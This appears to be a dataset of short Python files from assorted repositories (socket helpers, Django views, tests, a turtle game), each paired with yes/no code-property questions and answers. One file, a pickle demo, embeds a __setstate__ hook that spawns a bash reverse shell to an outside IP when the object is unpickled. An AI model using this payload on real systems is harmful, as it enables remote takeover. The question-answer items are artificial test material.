chunks = []
bytes_recd = 0
while bytes_recd < msglen:
chunk = self.conn.recv(min(msglen - bytes_recd, 2048))
if chunk == b'':
raise RuntimeError("socket connection broken")
chunks.append(chunk)
bytes_recd = bytes_recd + len(chunk)
return b''.join(chunks)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cla... | 3 | controlapp/monitorapp/src/serverapp/serversocket/reptilesserversocket.py | kuspen/reptiles-monitor |
# Connection libraries
import os
import shutil
import re
# Class create project
class Create:
def __init__(self, path):
self.path = path
# Create project
def createProject(self, name):
if not os.path.isdir(self.path + name):
shutil.copytree("launcher/shablon/", self.path + name)
else:
n, a = os.listdir(path=self.path), []
for s in n:
if s.find("new") != -1: a.append(s)
shutil.copytree("launcher/shablon/", self.path + name + str(len(a)))
# Delete project
def deleteProject(self, name):
shutil.rmtree(self.path+name) | [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answe... | 3 | create.py | KValexander/pygame_vn |
# custom PosLemmaTagger based on Chatterbot tagger
import string
from chatterbot import languages
import spacy
from chatterbot import tagging
class CustomPosLemmaTagger(tagging.PosLemmaTagger):
def __init__(self, language=None):
super(CustomPosLemmaTagger, self).__init__(language=None)
def get_bigram_pair_string(self, text):
"""
Return a string of text containing part-of-speech, lemma pairs.
"""
bigram_pairs = []
if len(text) <= 2:
text_without_punctuation = text.translate(self.punctuation_table)
if len(text_without_punctuation) >= 1:
text = text_without_punctuation
document = self.nlp(text)
if len(text) <= 2:
bigram_pairs = [
token.lemma_.lower() for token in document
]
else:
tokens = [
token for token in document if token.is_alpha and not token.is_stop
]
if len(tokens) < 2:
tokens = [
token for token in document if token.is_alpha
]
for index in range(0, len(tokens)):
bigram_pairs.append('{}:{}'.format(
tokens[index].pos_,
tokens[index].lemma_.lower()
))
if not bigram_pairs:
bigram_pairs = [
token.lemma_.lower() for token in document
]
return ' '.join(bigram_pairs)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | tagging.py | sciutrux/cbotami |
import vcr
from copy import deepcopy
from unittest import TestCase
from .test_helper import CLIENT, PLAYGROUND_SPACE
class ResourceTest(TestCase):
@vcr.use_cassette('fixtures/resource/copy.yaml')
def test_can_properly_deepcopy(self):
entry = CLIENT.spaces().find(PLAYGROUND_SPACE).environments().find('master').entries().all()[0]
copied_entry = deepcopy(entry)
self.assertEqual(entry.raw, copied_entry.raw)
self.assertEqual(entry.fields(), copied_entry.fields())
self.assertEqual(entry.id, copied_entry.id)
class LinkTest(TestCase):
@vcr.use_cassette('fixtures/link/space_resolve.yaml')
def test_space_link_resolve(self):
space = CLIENT.spaces().find(PLAYGROUND_SPACE)
resolved_space = space.to_link().resolve()
self.assertEqual(resolved_space.id, PLAYGROUND_SPACE)
self.assertEqual(str(resolved_space), str(space))
@vcr.use_cassette('fixtures/link/resolve.yaml')
def test_link_resolve(self):
content_type = CLIENT.content_types(PLAYGROUND_SPACE, 'master').find('foo')
resolved_ct = content_type.to_link().resolve(PLAYGROUND_SPACE, 'master')
self.assertEqual(resolved_ct.id, 'foo')
self.assertEqual(str(resolved_ct), str(content_type))
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},... | 3 | tests/resource_test.py | pce/contentful-management.py |
import brownie
def test_deposit_for(accounts, liquidity_gauge, mock_lp_token):
mock_lp_token.approve(liquidity_gauge, 2 ** 256 - 1, {"from": accounts[0]})
balance = mock_lp_token.balanceOf(accounts[0])
liquidity_gauge.set_approve_deposit(accounts[0], True, {"from": accounts[1]})
liquidity_gauge.deposit(100000, accounts[1], {"from": accounts[0]})
assert mock_lp_token.balanceOf(liquidity_gauge) == 100000
assert mock_lp_token.balanceOf(accounts[0]) == balance - 100000
assert liquidity_gauge.totalSupply() == 100000
assert liquidity_gauge.balanceOf(accounts[1]) == 100000
def test_set_approve_deposit_initial(accounts, liquidity_gauge):
assert liquidity_gauge.approved_to_deposit(accounts[0], accounts[1]) is False
def test_set_approve_deposit_true(accounts, liquidity_gauge):
liquidity_gauge.set_approve_deposit(accounts[0], True, {"from": accounts[1]})
assert liquidity_gauge.approved_to_deposit(accounts[0], accounts[1]) is True
def test_set_approve_deposit_false(accounts, liquidity_gauge):
liquidity_gauge.set_approve_deposit(accounts[0], False, {"from": accounts[1]})
assert liquidity_gauge.approved_to_deposit(accounts[0], accounts[1]) is False
def test_set_approve_deposit_toggle(accounts, liquidity_gauge):
for value in [True, True, False, False, True, False, True]:
liquidity_gauge.set_approve_deposit(accounts[0], value, {"from": accounts[1]})
assert liquidity_gauge.approved_to_deposit(accounts[0], accounts[1]) is value
def test_not_approved(accounts, liquidity_gauge, mock_lp_token):
mock_lp_token.approve(liquidity_gauge, 2 ** 256 - 1, {"from": accounts[0]})
with brownie.reverts("Not approved"):
liquidity_gauge.deposit(100000, accounts[1], {"from": accounts[0]})
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | tests/unitary/LiquidityGauge/test_deposit_for.py | AqualisDAO/curve-dao-contracts |
"""
This module defines the database classes.
"""
import pymongo
from atomate.utils.database import CalcDb
from atomate.utils.utils import get_logger
__author__ = "Kiran Mathew"
__credits__ = "Anubhav Jain"
__email__ = "kmathew@lbl.gov"
logger = get_logger(__name__)
class LammpsCalcDb(CalcDb):
def __init__(
self,
host="localhost",
port=27017,
database="lammps",
collection="tasks",
user=None,
password=None,
**kwargs
):
super().__init__(host, port, database, collection, user, password, **kwargs)
def build_indexes(self, indexes=None, background=True):
indexes = indexes or []
self.collection.create_index("task_id", unique=True, background=background)
self.collection.create_index(
[("completed_at", pymongo.DESCENDING)], background=background
)
for i in indexes:
self.collection.create_index(i, background=background)
def reset(self):
self.collection.delete_many({})
self.db.counter.delete_one({"_id": "taskid"})
self.db.counter.insert_one({"_id": "taskid", "c": 0})
self.build_indexes()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",... | 3 | atomate/lammps/database.py | Zhuoying/atomate |
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test for the ZMQ RPC methods."""
from test_framework.test_framework import DollarTestFramework
from test_framework.util import assert_equal
class RPCZMQTest(DollarTestFramework):
address = "tcp://127.0.0.1:217703"
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def skip_test_if_missing_module(self):
self.skip_if_no_py3_zmq()
self.skip_if_no_dollard_zmq()
def run_test(self):
self._test_getzmqnotifications()
def _test_getzmqnotifications(self):
self.restart_node(0, extra_args=[])
assert_equal(self.nodes[0].getzmqnotifications(), [])
self.restart_node(0, extra_args=["-zmqpubhashtx=%s" % self.address])
assert_equal(self.nodes[0].getzmqnotifications(), [
{"type": "pubhashtx", "address": self.address},
])
if __name__ == '__main__':
RPCZMQTest().main()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | test/functional/rpc_zmq.py | Dollar-coin/Dollar |
from conans import ConanFile, CMake
class AbcConan(ConanFile):
generators = "cmake", "cmake_find_package"
requires = "boost/1.76.0"
def build(self):
cmake = self.cmake
cmake.configure()
cmake.build()
@property
def cmake(self):
return CMake(self)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | conanfile.py | levenkov/alphabet |
"""
Tests utils for tagging.
"""
from django.template import Origin
from django.template.loaders.base import Loader
class VoidLoader(Loader):
"""
Template loader which is always returning
an empty template.
"""
is_usable = True
_accepts_engine_in_init = True
def get_template_sources(self, template_name):
yield Origin(
name='voidloader',
template_name=template_name,
loader=self)
def get_contents(self, origin):
return ''
def load_template_source(self, template_name, template_dirs=None):
return ('', 'voidloader:%s' % template_name)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inherit... | 3 | tagging/tests/utils.py | randlet/django-tagging |
from pybox.inject import Inject, InjectLazy
from pybox.service import IService, ServiceMode
class SingletonService(IService):
def who_am_i(self):
print(f'Singleton {id(self)}')
class FactoryService(IService):
singleton = Inject(SingletonService)
@classmethod
def service_mode(self):
return ServiceMode.FACTORY
def who_am_i(self):
print(f'Factory {id(self)}')
class A:
singleton1 = Inject(SingletonService)
singleton2 = InjectLazy(SingletonService)
factory1 = Inject(FactoryService)
factory2 = InjectLazy(FactoryService)
def who_am_i(self):
print(f'A {id(self)}')
if __name__ == '__main__':
a = A()
assert a.singleton1 is a.singleton2
assert isinstance(a.singleton1, SingletonService)
assert isinstance(a.factory1, FactoryService)
assert isinstance(a.factory2, FactoryService)
assert a.factory1 is not a.factory2
a.factory1.who_am_i()
a.factory2.who_am_i()
a.singleton1.who_am_i()
a.singleton2.who_am_i()
a.factory1.singleton.who_am_i()
a.factory2.singleton.who_am_i()
a.who_am_i()
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true... | 3 | tests/test_integration.py | vadim2404/pybox |
"""
_RunJobByStatus_
Monitoring DAO classes for Jobs in BossAir database.
It groups jobs in each sched_status and bossAir status and guarantee
all sched_status are always present in the output.
"""
from __future__ import print_function, division
from WMCore.Database.DBFormatter import DBFormatter
class RunJobByStatus(DBFormatter):
sql = """
SELECT bl_status.name AS sched_status, count(bl_runjob.sched_status) AS count, bl_runjob.status
FROM bl_status
LEFT OUTER JOIN bl_runjob ON bl_runjob.sched_status = bl_status.id
GROUP BY bl_status.name, bl_runjob.status
"""
def formatDict(self, results):
"""
_formatDict_
Creates a dictionary of active (status=1) and completed (status=0)
jobs in BossAir with their sched_status and the amount of jobs in that status
"""
formattedResults = DBFormatter.formatDict(self, results)
results = {'active': {}, 'completed': {}}
for res in formattedResults:
results['active'].setdefault(res['sched_status'], 0)
results['completed'].setdefault(res['sched_status'], 0)
if res['status'] is None:
pass # job count is always 0 for this case
elif int(res['status']) == 0:
results['completed'][res['sched_status']] += int(res['count'])
else: # status = 1
results['active'][res['sched_status']] += int(res['count'])
return results
def execute(self, conn=None, transaction=False):
result = self.dbi.processData(self.sql, conn=conn, transaction=transaction)
return self.formatDict(result)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docst... | 3 | src/python/WMCore/BossAir/MySQL/RunJobByStatus.py | khurtado/WMCore |
import superturtle, turtle
turtle.setup(500,500)
wn = turtle.Screen()
wn.title("Turtle Chase!")
wn.bgcolor("pink")
player_one = superturtle.SuperTurtle()
player_two = superturtle.SuperTurtle()
# make anouncements
player_one.write(" Bet you can't catch me!")
player_two.write(" Im gonna catch you man.")
# helper functions
def quit_window():
wn.bye()
def check():
print("checking")
keep_on_screen()
collision()
wn.ontimer(check, 10)
def keep_on_screen():
# check player_1 one all 4 angles
if player_one.xcor() < -250:
player_one.goto(-249, player_one.ycor())
if player_one.xcor() > 250:
player_one.goto(249, player_one.ycor())
if player_one.ycor() < -250:
player_one.goto(player_one.xcor(), -249)
if player_one.ycor() > 250:
player_one.goto(player_one.xcor(), 249)
# check player_2 on all 4 angles
if player_two.xcor() < -250:
player_two.goto(-249, player_two.ycor())
if player_two.xcor() > 250:
player_two.goto(249, player_two.ycor())
if player_two.ycor() < -250:
player_two.goto(player_two.xcor(), -249)
if player_two.ycor() > 250:
player_two.goto(player_two.xcor(), 249)
def collision():
x_diff = abs(player_one.xcor() - player_two.xcor())
y_diff = abs(player_one.ycor() - player_two.ycor())
if x_diff < 20 and y_diff <20:
quit_window()
# PLAYER ONE CONTROLS
wn.onkey(player_one.move_forward, "Up")
wn.onkey(player_one.turn_left, "Left")
wn.onkey(player_one.turn_right, "Right")
wn.onkey(player_one.home, "Down") #jump to middle of screen
# PLAYER TWO CONTROLS
wn.onkey(player_two.move_forward, "w")
wn.onkey(player_two.turn_left, "a")
wn.onkey(player_two.turn_right, "d")
wn.onkey(player_two.home, "s") #jump to middle of screen
# GAME CONTROLS
wn.onkey(quit_window, "q")
wn.listen()
# check for collision and out of bounds
check()
wn.mainloop() | [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | TurtleChase.py | ewiertel/TurtleChase |
from django.core.checks import messages
from rest_framework import generics
from rest_framework.response import Response
from posts.models import Post
from .serializers import PostSerializer, UpVoteSerializer
class PostList(generics.ListCreateAPIView):
queryset = Post.objects.all()
serializer_class = PostSerializer
class PostDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Post.objects.all()
serializer_class = PostSerializer
class UpVoteAPIView(generics.GenericAPIView):
serializer_class = UpVoteSerializer
def post(self, request, format=None):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
post_id = serializer.data['post_id']
post= Post.objects.filter(pk=post_id).first()
if post:
post.upvotes_count += 1
post.save()
return Response({
'message': 'Post has been sucessfully upvoted'
})
return Response({
"message": "Post does not exist"
})
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{... | 3 | posts/views.py | hamzabell/hackernews_mvp |
from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import scrape_mars
# Create an instance of Flask
app = Flask(__name__)
# Use PyMongo to establish Mongo connection
app.config["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
# Route to render index.html template using data from Mongo
@app.route("/")
def home():
# Find one record of data from the mongo database
destination_data = mongo.db.collection.find_one()
# Return template and data
return render_template("index.html", mars_scraped_data=destination_data)
# Route that will trigger the scrape function
@app.route("/scrape")
def scrape():
# Run the scrape function
mars_scraped_data = scrape_mars.scrape_info()
# Update the Mongo database using update and upsert=True
mongo.db.collection.update({}, mars_scraped_data, upsert=True)
# Redirect back to home page
return redirect("/")
if __name__ == "__main__":
app.run(debug=True) | [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | Missions_to_Mars/app.py | Ivanpalalia/web-scraping-challenge |
# coding=utf-8
__author__ = 'JIANGH'
__all__ = [
'judge', 'event', 'find', 'excel', 'database',
'ModeType', 'Args',
'get_action', 'get_actions_def'
]
class ModeType():
"""选择器模式枚举"""
ID = 'id'
CLASS = 'class'
CSS_SELECTOR = 'css'
XPATH = 'xpath'
NAME = 'name'
INNER_TEXT = 'text'
PARTIAL_TEXT = 'partial_text'
class Args(object):
"""装饰器\n
标记函数需要哪些参数(拓展用:执行前检查参数名和数目正不正确等)\n
For example:\n
@arg({
'arg': {require type of this arg},
'mode': None #None for default (or select type)
'index': 'number' #for create a vaildator
})
"""
def __init__(self, args):
self.__args = args
def __call__(self, func):
return self.decorator(func)
def decorator(self, func):
import functools
@functools.wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.args = self.__args
return wrapper
def get_action(action_name):
"""
根据action_name字符串取得对应方法,取不到时抛出异常
"""
from . import event, find, judge, excel, database
package_group = [event, find, judge, excel, database]
for action_package in package_group:
if getattr(action_package, action_name, None):
return getattr(action_package, action_name, None)
raise Exception('Could not find the action of %s' % action_name)
def get_actions_def():
"""
取得所有action的签名定义,dict形式\n
key为action_name\n
value为参数及类型\n
"""
def is_action(module, action_name):
'''判断一个名称是否是模块中的action'''
if len(action_name) < 1: return False
return action_name[0] != '_' and isinstance(getattr(module, action_name, None), types.FunctionType)
import types
from . import event, find, judge, excel, database
package_group = [event, find, judge, excel, database]
all_actions = {}
for module in package_group:
all_actions = {**all_actions, **{fn: getattr(getattr(module, fn), 'args', None) for fn in dir(module) if is_action(module, fn)}}
return all_actions
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | api/autotest/testcodegen/actions/__init__.py | P-JIANGH/autonium |
import abc
class SubCmd(abc.ABC):
@abc.abstractmethod
def add_parser(self, subparser):
return NotImplemented
@abc.abstractmethod
def execute(self, args):
return NotImplemented
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | management/subcmd.py | ddio/591-espresso |
def accepts(*types):
def check_accepts(f):
assert len(types) == f.__code__.co_argcount
def new_f(*args, **kwds):
for (a, t) in zip(args, types):
if not isinstance(a, t):
raise TypeError("arg %r does not match type %s" % (a, t))
return f(*args, **kwds)
new_f.__name__ = f.__name__
return new_f
return check_accepts
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"... | 3 | pyquantfinance/decorators.py | anthonyfong100/Pynance |
"""Test code for reorg"""
import logging
import numpy as np
import tvm
import topi
import topi.testing
from topi.util import get_const_tuple
def verify_reorg(batch, in_size, in_channel, stride):
'''Verify reorg operator by comparing outputs from tvm and numpy implementation'''
in_height = in_width = in_size
A = tvm.placeholder((batch, in_channel, in_height, in_width), name='A')
B = topi.cpp.vision.reorg(A, stride)
a_shape = get_const_tuple(A.shape)
dtype = A.dtype
def get_ref_data_reorg():
'''Randomly initialize the data variables and get refernce output for the reorg operation'''
a_np = np.random.uniform(size=a_shape).astype(dtype)
b_np = topi.testing.reorg_python(a_np, stride)
return a_np, b_np
a_np, b_np = get_ref_data_reorg()
def check_device(device):
'''Check the device is available and if so, build and run the program'''
if not tvm.module.enabled(device):
print("Skip because %s is not enabled" % device)
return
print("Running on target: %s" % device)
target = topi.cpp.TEST_create_target(device)
if device == "llvm":
s = topi.cpp.generic.default_schedule(target, [B], False)
else:
s = topi.cpp.cuda.schedule_injective(target, [B])
ctx = tvm.context(device, 0)
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=B.dtype), ctx)
func = tvm.build(s, [A, B], device, name="reorg")
func(a, b)
tvm.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)
for device in ['cuda', 'opencl', 'metal', 'rocm', 'llvm', 'vulkan']:
check_device(device)
def test_reorg():
verify_reorg(1, 38, 64, 2)
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
test_reorg()
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | topi/tests/python_cpp/test_topi_reorg.py | TharinduRusira/tvm |
import pickle
import os
class foobar:
def __init__(self):
pass
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
# The attack is from 192.168.1.10
# The attacker is listening on port 8080
os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.1681.10/8080 0>&1"')
my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | python/pickle/remote.py | zeroam/TIL |
from pluto.control.modes import mode
from pluto.control.modes.processes import process_manager
from protos import broker_pb2_grpc
class LiveControlMode(mode.ControlCommandHandler):
def __init__(self, server, framework_url, process_factory):
super(LiveControlMode, self).__init__(framework_url, process_factory)
broker_pb2_grpc.add_BrokerServicer_to_server(self._broker, server)
def _create_process_manager(self):
return process_manager.LiveProcessManager()
def _accept_loop(self, loop):
# todo: only accept LiveLoop type or subtypes
return False
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cl... | 3 | pluto/control/modes/live_mode.py | chalant/pluto |
'''https://leetcode.com/problems/symmetric-tree/'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def isMirror(self, left, right):
if left is None and right is None:
return True
if left is None or right is None:
return False
if left.val==right.val:
return self.isMirror(left.left, right.right) and self.isMirror(left.right, right.left)
else:
return False
def isSymmetric(self, root: TreeNode) -> bool:
if not root:
return True
return self.isMirror(root.left, root.right)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | src/101-symmetric-tree.py | sahilrider/LeetCode-Solutions |
# coding=utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2018
import unittest
from streamsx.topology.topology import *
from streamsx.topology.tester import Tester
import streamsx.spl.op as op
import streamsx.spl.toolkit
import spl_tests_utils as stu
class TestRemote(unittest.TestCase):
""" Test remote build with a SPL python primitive operator
that has not been extracted, so the extraction and
pip requirements install is all done remotly.
"""
def setUp(self):
Tester.setup_streaming_analytics(self, force_remote_build=True)
def test_with_pint(self):
schema='tuple<float64 temp>'
topo = Topology()
streamsx.spl.toolkit.add_toolkit(topo, stu._tk_dir('testtkpy_remote'))
s = topo.source([0, 100, 28.5])
s = s.map(lambda t : {'temp':t}, schema=schema)
fh = op.Map(
"com.ibm.streamsx.topology.pytest.temps::ToFahrenheit",
s)
r = fh.stream.map(lambda x : x['temp'])
tester = Tester(topo)
# We round off to ints because pint temp conversion
# is actually incorrect!
tester.contents(r, [32.0, 212.0, 83.0])
tester.test(self.test_ctxtype, self.test_config)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true... | 3 | test/python/spl/tests/test_splpy_remote.py | Jaimie-Jin1/streamsx.topology |
from rest_framework import serializers
from rest_framework.validators import UniqueValidator
from foundation.models import Instrument, Sensor, TimeSeriesDatum
class InstrumentSerializer(serializers.Serializer):
id = serializers.IntegerField(read_only=True)
location = serializers.CharField(validators=[
UniqueValidator(queryset=Instrument.objects.all())
])
serial_number = serializers.UUIDField(read_only=True)
name = serializers.CharField(read_only=True)
def create(self, validated_data):
location = validated_data.get('location', None)
instrument = Instrument.objects.create(location=location)
return instrument
def update(self, object, validated_data):
object.url = validated_data.get('url')
object.save()
return object
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/... | 3 | indoorair/instrument/serializers.py | caimingxiang/indoorair-webapp-b |
import wx
from wx.dataview import DataViewListCtrl
class WeekOverview(wx.Panel):
def __init__(self, parent):
super().__init__(parent)
self.dayrow = ['Montag', '', '', '']
self.data = ['Creadis', 'HOURS', '9.5h', 'Viel Arbeit']
self._init_controls()
self._init_sizers()
self._init_events()
def _init_controls(self):
self.listctrl = DataViewListCtrl(self, style=wx.dataview.DV_HORIZ_RULES)
self.listctrl.AppendTextColumn('Company')
self.listctrl.AppendTextColumn('Task')
self.listctrl.AppendTextColumn('Hours')
self.listctrl.AppendTextColumn('Description')
self.listctrl.AppendItem(self.dayrow)
self.listctrl.AppendItem(self.data)
def _init_sizers(self):
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(self.listctrl, 1, wx.EXPAND)
self.SetSizerAndFit(main_sizer)
def _init_events(self):
self.Bind(wx.EVT_SIZE, self._on_resize_list, self)
def _on_resize_list(self, event):
event.Skip()
new_width = self.GetSize()[0]
cur_width = 0
for i in range(4):
col = self.listctrl.GetColumn(i)
cur_width += col.GetWidth()
if i == 3:
last_col_width = col.GetWidth()
diff = new_width - cur_width
set_width = last_col_width + diff - 4
if set_width > 0:
self.listctrl.GetColumn(3).SetWidth(set_width)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | gui/WeekOverview.py | Tabascl/TimeCapture |
import asyncio
import time
"""
"""
async def main():
def consuming(delay):
time.sleep(delay)
print("time consuming....")
# 在不同一线程中, 执行 blocking code
# TODO: 这里也可以直接使用 Thread 对象执行任务。
ft = loop.run_in_executor(None, consuming, 5)
ft1 = loop.run_in_executor(None, consuming, 5)
ft2 = loop.run_in_executor(None, consuming, 5)
ft3 = loop.run_in_executor(None, consuming, 5)
ft4 = loop.run_in_executor(None, consuming, 5)
await ft, ft1, ft2, ft3, ft4
if __name__ == '__main__':
print(time.strftime("%X"))
loop = asyncio.get_event_loop()
loop.create_task(main())
loop.run_forever() # Run the event loop until stop() is called. | [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | python/asyncss/07async_thread.py | edgells/dev_coms |
"""
题目:有四个数字:1、2、3、4,能组成多少个互不相同且无重复数字的三位数?各是多少?分别每行打印一个输出全部
"""
def get_number_performance(number):
target_number = []
for hundred_number in number:
for tens_digit in number:
for the_unit in number:
if (hundred_number != tens_digit) and (tens_digit != the_unit) and (the_unit != hundred_number):
target_number.append(hundred_number * 100 + tens_digit * 10 + the_unit)
return target_number
def print_target_number(items):
for item in items:
print(item)
print('totally count is :', len(items)) # how many numbers
if __name__ == "__main__":
init_array = [1, 2, 3, 4]
print_target_number(get_number_performance(init_array))
"""
123
124
132
134
142
143
213
214
231
234
241
243
312
314
321
324
341
342
412
413
421
423
431
432
totally count is : 24
"""
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | get_right_num.py | LindaWang20160504/PythonLearning |
from Pathfinder import PathFinder
import numpy as np
import winsound
def generate_map_collage():
maps_coords = pf.get_maps_coords()
maps = []
shape = (abs(end[1] - start[1]) + 1, abs(end[0] - start[0]) + 1)
counter = 0
for coord in maps_coords:
map_infos = pf.llf.coord_fetch_map(coord, pf.worldmap)
counter += 1
print('{}/{}'.format(counter, shape[0]*shape[1]))
if map_infos is not None and np.array(map_infos).shape == (40, 14):
maps.append(map_infos)
elif map_infos is not None and np.array(map_infos).shape != (40, 14):
maps.append([[5]*14]*40)
else:
maps.append([[1] * 14] * 40)
glued = pf.glue_maps(maps, shape)
# print(glued)
# print(pf.adapted_maps)
pf.map_to_image(pf.adapt_shape_maps(glued), 1)
def generate_path():
pf.get_path()
pf.add_path_to_adapted_maps()
pf.add_map_change_coords_to_adapted_maps()
pf.map_to_image(pf.adapted_maps, 1)
print(pf.path_cells)
print(pf.get_map_change_cells())
return(pf.get_map_change_cells())
lel = [(4, -19), (-5, -23), (-13, -28), (-3, -42), (-17, -47), (-32, -56), (-27, -36), (-20, -20), (-16, 1), (-25, 12), (-15, 25), (-26, 35)]
start = (4, -19)
end = (-5, -23)
worldmap = 1
pf = PathFinder(start, end, None, None, worldmap)
path = generate_path()
print('Done !')
winsound.PlaySound('../Utils/sound.wav', winsound.SND_FILENAME)
__author__ = 'Alexis'
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | ModelTests/test_Pathfinder.py | ProjectBlackFalcon/DatBot |
"""
Antoine Grouazel
Nov 2019
"""
import netCDF4
import numpy as np
import logging
from src.config import RASTER_NASA_COASTLINE
